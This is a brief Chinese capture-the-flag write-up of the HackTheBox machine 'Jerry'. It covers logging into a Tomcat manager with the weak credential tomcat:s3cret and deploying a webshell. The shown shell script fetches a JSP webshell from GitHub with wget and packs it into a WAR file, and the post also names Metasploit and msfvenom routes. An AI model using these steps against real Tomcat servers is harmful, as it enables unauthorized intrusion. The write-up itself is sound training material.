关于渗透测试:HTBJerry

easy box.

首先nmap开路:

找到8080端口:

Tomcat字典:
https://raw.githubusercontent…
找到弱口令tomcat:s3cret

部署war包:
办法1:
官网walkthrough上的:

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 

部署wshell:

门路比拟深

拿到flag

办法2:
msf应用multi/http/tomcat_mgr_upload



办法3:
msfvenom生成war包

上传war包后nc:

【腾讯云】轻量 2核2G4M,首年65元

阿里云限时活动-云数据库 RDS MySQL  1核2G配置 1.88/月 速抢

本文由乐趣区整理发布,转载请注明出处,谢谢。

您可能还喜欢...

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据